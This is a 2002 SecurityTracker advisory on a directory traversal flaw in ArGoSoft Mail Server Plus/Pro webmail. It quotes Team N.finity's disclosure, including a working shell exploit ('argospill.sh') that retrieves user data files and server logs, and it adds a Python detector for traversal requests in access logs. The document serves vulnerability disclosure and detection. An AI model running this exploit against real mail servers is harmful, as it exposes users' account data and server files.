SecurityTracker.com

SecurityTracker
Archives


 






Category:   Application (E-mail Server)  >   ArGoSoft Mail Server
Vendors:   ArGo Software Design
ArGoSoft Mail Server Input Validation Flaw Lets Remote Users View Files on the System
SecurityTracker Alert ID:  1004696
SecurityTracker URL:  http://securitytracker.com/id/1004696
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jul 3 2002
Impact:   Disclosure of system information, Disclosure of user information
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): 1.8.1.5 and prior versions
Description:   A vulnerability was reported in the ArGoSoft Mail Server Plus/Pro. A remote user can use directory traversal to view files on the system.

Team N.finity issued a security advisory warning that a remote user can perform a reverse directory traversal to view any file on the drive that System can read. This can be achieved by sending a URL to the web server that includes a series of "/.." strings after the path to the images of the webmail server or of the mail attachments for a valid user.

Apparently, the file name must be specified, as directory listings cannot be obtained.

According to the report, the freeware edition of ArGoSoft Mail Server is not vulnerable.

Some demonstration exploit code is provided in the Source Message.

Impact:   A remote user can view files located on the same drive as the mail server with the privileges of the mail server.
Solution:   The vendor has released a fixed version (1.8.1.6), available at:

http://www.argosoft.com/applications/mailserver/download.asp

Vendor URL:  www.argosoft.com/applications/mailserver/
Cause:   Access control error, Input validation error
Underlying OS:   Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   None.
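
An added detection example, not part of the SecurityTracker alert or the Team N.finity advisory: it scans web access-log lines for requests whose path uses ".." to step out of the webmail images or _tempatt attachment directory, the pattern this alert describes. The common log format, the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Directories the advisory names as traversal starting points.
ANCHORS = ("images", "_tempatt")
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')


def climbs_out(target: str) -> bool:
    """True if a '..' segment steps out of an images/_tempatt directory."""
    path = target.split("?", 1)[0]
    # Decode twice (double encoding) and treat '\' as a separator, as Windows does.
    path = unquote(unquote(path)).replace("\\", "/")
    depth = None  # segments below the anchor directory; None = not inside one yet
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if depth == 0:
                return True
            if depth is not None:
                depth -= 1
        elif depth is not None:
            depth += 1
        elif seg.lower() in ANCHORS:
            depth = 0
    return False


def flag_traversal(log_lines):
    """Return (client, target) for each request that leaves an anchor directory."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match and climbs_out(match.group(1)):
            hits.append((line.split(" ", 1)[0], match.group(1)))
    return hits


# Constructed sample lines in common log format (an assumption, not ArGoSoft's own format).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Jul/2002:13:40:01 +0800] "GET /images/logo.gif HTTP/1.0" 200 1532',
    '192.0.2.77 - - [03/Jul/2002:13:41:12 +0800] "GET /images/../_logs/2002-07-02.txt HTTP/1.0" 200 48211',
    '192.0.2.77 - - [03/Jul/2002:13:41:15 +0800] "GET /_users/example.test/alice/_tempatt/../userdata.rec HTTP/1.0" 200 310',
    '192.0.2.10 - - [03/Jul/2002:13:42:03 +0800] "GET /images/skin/../logo.gif HTTP/1.0" 200 1532',
]

if __name__ == "__main__":
    for client, target in flag_traversal(SAMPLE_LOG):
        print(f"traversal out of webmail directory: {client} {target}")
```

Requests that use ".." but stay inside the directory, such as the last sample line, are not flagged.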


 Source Message Contents

Date:  Wed, 3 Jul 2002 13:32:54 +0800
Subject:  Argosoft Mail Server Plus/Pro Webmail Reverse Directory Traversal


Team N.finity Security Advisory
03/07/2002

Argosoft Mail Server Plus/Pro Webmail Reverse Directory Traversal


Summary
===================

    Argosoft Mail Server Pro contains a built-in HTTP server for
    webmail access. Without logging in, an attacker can do a
    reverse directory traversal to retrieve any file on the drive
    that System can read by specifying a series of "/.." after the
    path to the images of the webmail server or of the mail
    attachments for a valid user.


Systems Affected
===================

    Any Windows system using the webmail feature of Argosoft Mail 
    Server Plus / Pro <= 1.8.1.5

    The freeware edition of Argosoft Mail Server is not vulnerable.


Impact
===================

    An attacker can retrieve any file on the disk readable by
    the mail server.  The filename and relative path need to be
    specified, as directory listings are not generated.  Executable
    files are also not run as this is not supported by the webmail.


Explanation
===================

    Argosoft Mail Server comes in three versions: Freeware, Plus,
    and Pro. The Plus and Pro versions come with a built-in web
    server to provide simple Webmail access to users' mail.

    The webmail server does not check for reverse directory
    traversal. This allows an attacker to exploit the images or
    attachments directory to list the contents of files on the
    drive.

    Also, normally, a user will have to log into Argosoft Mail
    Server Pro's webmail in order to read his mail and attachments.
    However, it allows non-authenticated users to retrieve files
    via the attachments URL, as long as a valid path is specified.
    This can be exploited to retrieve the attachments of users in
    certain conditions, or can also be reverse traversed.

    While the attachments folder is deleted once the user logs out
    of the webmail or after 20 minutes of inactivity, this exploit
    will work even if the attachments folder is not present.


Solution
===================

    The vendor has released a new version at
    http://www.argosoft.com/applications/mailserver/


Acknowledgments
===================

    Vulnerability discovery, exploit code, and advisory by Mayhem
    of Team N.finity.


Contact Information
===================

    Team N.finity can be reached by mailing to
    nfinity@gmx.net.


References
===================

    [1] Team N.finity
    http://nfinity.yoll.net/


Disclaimer
===================

    This advisory does not claim to be complete or to be usable for
    any purpose.  Information about the vulnerable systems may be
    inaccurate or wrong.  Any supplied exploits are not to be used
    for malicious purposes, but for educational purposes only.

    This advisory is free for open distribution in unmodified form.
    Articles that are based on information from this advisory
    should include link [1].


Exploit Code
===================

#!/bin/sh
#
# released on 06/07/2002 by team n.finity <nfinity@gmx.net>
# find us at http://nfinity.yoll.net/
#
# argospill.sh

HOST=$1
USER=$2
DOMAIN=$3

startpro()
{
    echo -e "\nSpilling user $USER @ $DOMAIN, host $HOST (Pro)\n"
    URL=/_users/$DOMAIN/$USER/_tempatt/../userdata.rec
    /usr/bin/lynx -dump http://$HOST$URL
}

startplus()
{
    echo -e "\nSpilling user $USER, host $HOST (Plus)\n"
    URL=/$USER/_tempatt/../userdata.rec
    /usr/bin/lynx -dump http://$HOST$URL
}

startboth()
{
    echo -e "\nSpilling host $HOST (Plus / Pro)\n"
    URL=/images/../_logs/`date -d '-1 day' +%Y-%m-%d`.txt
    /usr/bin/lynx -dump http://$HOST$URL
}

usage()
{
    echo -e "\nUsage:\n"
    echo "Both - $0 <host>"
    echo "Pro  - $0 <host> <user> <domain>"
    echo "Plus - $0 <host> <user>"
    echo -e "\nExample:\n"
    echo "Both, images dir - $0 www.test.com"
    echo "Plus, no dom req - $0 www.test.com me"
    echo "Pro, default dom - $0 www.test.com me _nodomain"
    echo "Pro, virtual dom - $0 www.test.com me test.com"
}

echo "Argospill 1.0 by Team N.finity"

if [ -n "$HOST" ]; then
    if [ -n "$USER" ]; then
        if [ -n "$DOMAIN" ]; then
            startpro
        else
            startplus
        fi
    else
        startboth
    fi
else
    usage
fi




 
 



Copyright 2013, SecurityGlobal.net LLC